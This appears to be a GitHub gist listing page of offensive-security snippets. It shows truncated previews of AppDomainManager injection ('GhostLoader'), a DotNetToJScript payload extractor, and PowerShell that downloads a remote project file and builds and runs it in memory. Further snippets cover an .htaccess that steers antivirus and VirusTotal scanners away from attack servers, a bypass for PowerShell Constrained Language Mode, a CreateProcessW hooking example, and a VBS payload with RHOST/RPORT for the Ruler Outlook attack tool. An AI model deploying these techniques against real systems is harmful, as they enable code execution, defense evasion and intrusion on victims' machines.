GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
Leo Loobeek leoloobeek
leoloobeek
/ _Instructions_Reproduce.md
Created
April 29, 2020 11:53
GhostLoader - AppDomainManager - Injection - 攻壳机动队
leoloobeek
/ JScriptToDotnet.js
Created
November 28, 2018 18:50
Sample Extract Payload DotNetToJScript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Base64 Raw Decoder | |
| function Base64Decode(str) { | |
| if (!(/^[a-z0-9+/]+={0,2}$/i.test(str)) || str.length%4 != 0) throw Error('Not base64 string'); | |
| var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; | |
| var o1, o2, o3, h1, h2, h3, h4, bits, d=[]; | |
| for (var c=0; c<str.length; c+=4) { // unpack four hexets into three octets |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-PublicKey | |
| { | |
| [OutputType([byte[]])] | |
| PARAM ( | |
| [Uri]$Uri | |
| ) | |
| if (-Not ($uri.Scheme -eq "https")) | |
| { | |
| Write-Error "You can only get keys for https addresses" |
leoloobeek
/ Build_In_Memory_CSharp_Project.txt
Created
April 4, 2018 17:03
— forked from bohops/Build_In_Memory_CSharp_Project.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] | |
| - Launch program (payload) |
leoloobeek
/ Build_In_Memory_CSharp_XSLT_Project.txt
Created
March 8, 2018 16:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| In-memory PowerShell XSLT project build: | |
| [Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); | |
| $proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj") | |
| $e=new-object Microsoft.Build.Evaluation.Project($proj); | |
| $e.build(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <data> | |
| <circle> | |
| <radius>12</radius> | |
| </circle> | |
| <circle> | |
| <radius>37.5</radius> | |
| </circle> | |
| </data> |
leoloobeek
/ .htaccess
Created
March 1, 2018 17:05
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # ForcePoint | |
| RewriteCond expr "-R '208.80.192.0/21'" [OR] | |
| # AWS & Other VT hosts | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] |
leoloobeek
/ Remove-ConstrainedLanguageMode.ps1
Created
February 14, 2018 17:35
— forked from jschell/Remove-ConstrainedLanguageMode.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Remove-ConstrainedLanguageMode { | |
| <# | |
| .Synopsis | |
| Set language mode for a powershell session to 'full'. | |
| .Description | |
| Set language mode for a powershell session to 'full'. Leverages 'InstallUtil' | |
| and the Microsoft.Diagnostics.Runtime.dll resouces to adjust in memory values. | |
| .Example |
leoloobeek
/ Injectable.cpp
Created
December 19, 2017 18:37
— forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |
leoloobeek
/ Command.vbs
Created
November 6, 2017 23:14
— forked from staaldraad/Command.vbs
Using VBSMeter with Ruler
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Call X() | |
| End Function | |
| Dim RHOST: RHOST = "x.x.x.x" | |
| Dim RPORT: RPORT = "8999" | |
| Function Base64ToStream(b) | |
| Dim enc, length, ba, transform, ms | |
| Set enc = CreateObject("System.Text.ASCIIEncoding") | |
| length = enc.GetByteCount_2(b) |
NewerOlder